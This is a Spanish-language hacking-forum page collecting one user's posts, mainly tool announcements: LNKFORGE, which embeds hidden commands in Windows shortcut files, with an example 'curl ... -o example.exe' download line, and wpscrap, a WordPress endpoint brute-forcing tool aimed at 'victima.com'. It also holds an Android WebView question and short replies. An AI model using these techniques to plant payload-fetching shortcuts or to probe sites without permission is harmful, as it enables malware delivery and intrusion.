Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - Killer829292

#1
Saludos igualmente pana buen aporte gracias.
#2
🎯 LNKFORGE: Generador de accesos directos .LNK con payloads embebidos

💡 ¿Qué es LNKFORGE?
LNKFORGE es una herramienta desarrollada para generar archivos LNK (accesos directos de Windows) con comandos embebidos, sin necesidad de utilizar Wine, entornos Windows ni librerías externas. Su principal objetivo es modificar la estructura interna de un .LNK codificado en Base64, para inyectar comandos personalizados que se ejecutarán al abrir el acceso directo.
🔧 El script es completamente multiplataforma y puede ejecutarse en:
  • Windows
  • Linux
  • Termux (Android)

📦 Instalación
No hay dependencias externas requeridas, solo necesitas tener Python 3 instalado.
Código: text
git clone https://github.com/IND4RKHK/lnkforge.git
cd lnkforge
python lnkforge.py


📁 ¿Cómo funciona?
LNKFORGE se basa en la edición de un archivo .LNK
codificado en base64, insertando un bloque de comandos UTF-16BE codificados también en base64. Esto se hace de manera quirúrgica para no corromper la estructura del .LNK
.
📌 Estructura interna y conceptos clave:
  • 🧬b64_extra_bytes: Contiene el relleno de bytes " =============== " codificado en base64 (UTF-16BE). Este relleno define el "espacio disponible" en el .LNK para los comandos embebidos.
  • 🛠 check_len_or_save(): Función encargada de codificar los comandos a UTF-16BE y luego a base64, devolviendo su longitud o el texto listo para ser insertado.
  • 📜modular_lnk.b64: Archivo base que contiene las versiones originales del .LNK en diferentes modos:
    • Código: text
      normal
    • Código: text
      minimal
    • Código: text
      normal-icon
    • Código: text
      minimal-icon
  • 🧩 El script detecta automáticamente si el payload sobrepasa el límite de espacio disponible en el .LNK
     y recorta el último comando ingresado para garantizar integridad.

✍️ Uso paso a paso
Código: text
python lnkforge.py

  • ✨ Escribe comandos como
    Código: text
    ls

    Código: text
    whoami

    Código: text
    systeminfo

    Código: text
    curl https://example.com/file.x -o example.exe
  • 💬 Usa los comandos especiales para cambiar el modo:
    • Código: text
      minimal
      ➡️ Ejecuta en modo minimizado.
    • Código: text
      minimal-icon
      ➡️ Minimizado + icono personalizado.
    • Código: text
      normal
      ➡️ Ejecuta en primer plano.
    • Código: text
      normal-icon
      ➡️ Primer plano + icono.
  • 🧠 El script calcula el tamaño del payload y corta automáticamente si te excedes.
  • 💾 Se genera un archivo .LNK con fecha automática en su nombre, listo para ser ejecutado.

🚀 Ejemplo práctico
Código: text
cmd_lnk_executor >> whoami
cmd_lnk_executor >> ipconfig
cmd_lnk_executor >> exit

📁 Se generará un archivo
Código: text
lnk_forged_2025-11-20.lnk
con los comandos embebidos.

🧪 Detalles técnicos
  • Se utiliza codificación UTF-16BE para garantizar compatibilidad con PowerShell.
  • Se reconstruye el .LNK a partir del archivo base .b64, eliminando saltos de línea y ajustando los caracteres "=" para una decodificación correcta.
  • El límite actual de bytes embebidos está determinado por la estructura original del .LNK.
  • El script incluye un relleno suficientemente grande para permitir payloads medianos-grandes (~270 bytes).

🧠 Conclusiones
Esta herramienta demuestra cómo es posible modificar accesos directos .LNK a bajo nivel sin interfaces gráficas ni dependencias externas. Ideal para pruebas de ingeniería inversa, ofuscación o entrenamiento en análisis de malware.
🛡� Úsese con fines educativos y éticos.

📎 Repositorio: 👉 No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
#3
💣 [Release] wpscrap - Raspado de Endpoints WordPress 💣

Hola mi gente de Underc0de 😈
Quería compartir con ustedes un proyecto en el que estoy trabajando, llamado mgt0ls. Hoy quiero enfocarme en una de sus herramientas llamada: wpscrap.

🚀 ¿Qué es wpscrap?
wpscrap es una herramienta diseñada para realizar raspado de endpoints en sitios WordPress. Su principal objetivo es identificar puntos de exposición o realizar ataques por fuerza bruta para descubrir endpoints ocultos o bloqueados. 💥
⚙️ ¿Cómo lo hace?
La herramienta cuenta con dos enfoques principales:
  • Exposición de Endpoints: Detecta endpoints que están públicamente accesibles.
  • Fuerza Bruta (Diccionario): Utiliza un diccionario para encontrar rutas bloqueadas o no indexadas.
Además, cuenta con una opción recursiva para verificar todos los endpoints descubiertos, facilitando la enumeración completa.

💻 Instalación
Para instalar wpscrap, sigue estos pasos:
  • Clona el repositorio:
    Código: text
    git clone https://github.com/IND4RKHK/mgt0ls.git
    cd mgt0ls
  • Ejecuta el instalador:
    Código: text
    python3 setup.py
  • ¡Listo! Ya tienes la herramienta instalada.

🖥� ¿Cómo usar wpscrap?
Puedes usar la herramienta desde la GUI de mgt0ls o directamente desde la consola, ¡como prefieras! 😎
Ejemplo de Uso:
Código: text
python3 fsh.py wpscrap --a https://example.com/ --b SET --c CHECK


📝 Parámetros:
  • Código: text
    --a
    : Define la URL objetivo.
  • Código: text
    --b SET
    : Realiza el ataque identificando endpoints mediante exposición pública.
  • Código: text
    --b DIC
    : Realiza el ataque por diccionario para detectar rutas bloqueadas.
  • Código: text
    --c CHECK
    : Utiliza la opción recursiva para seguir encontrando endpoints relacionados.

💡 Ejemplo práctico:
Ataque de exposición:
Código: text
python3 fsh.py wpscrap --a https://victima.com/ --b SET --c CHECK

Ataque por diccionario:
Código: text
python3 fsh.py wpscrap --a https://victima.com/ --b DIC --c CHECK


Eso es todo por ahora, ¡espero que les sea útil en sus auditorías de seguridad! Cualquier duda o sugerencia, ¡déjenla en los comentarios! 💀🔥


#5
Hola buenas me gustaria saber como hacer para abrir en google este enlace que esta en mi app. Lo que quiero es que al entrar en la aplicacion se ejecute google y en esta se abara el url no que se ejecute en la app... Porfavor ayuda este es mi main activity...

public class MainActivity extends Activity {

    private WebView webView;

    @No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.activity_main);



        webView = (WebView)findViewById(R.id.web);


        webView.setWebViewClient(new WebViewClient() {
            @No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
            public boolean shouldOverrideUrlLoading(WebView view, String url) {
                return false;
            }

            @TargetApi(Build.VERSION_CODES.N)
            @No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
            public boolean shouldOverrideUrlLoading(WebView view, WebResourceRequest request) {
                return false;
            }
        });

        webView.loadUrl("www.url.com");
    }

    @No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
    public boolean onKeyDown(int keyCode, KeyEvent event) {
        if (event.getAction() == KeyEvent.ACTION_DOWN) {
            switch (keyCode) {
                case KeyEvent.KEYCODE_BACK:
                    if (webView.canGoBack()) {
                        webView.goBack();
                    } else {
                        finish();
                    }
                    return true;
            }

        }
        return super.onKeyDown(keyCode, event);
    }
}
#6
Análisis y desarrollo de malwares / XD
Marzo 04, 2018, 11:02:24 PM
Nose xd
#7
Presentaciones y cumpleaños / Hacking apps
Diciembre 22, 2017, 06:55:56 PM
chat creado con el fin de compartir :V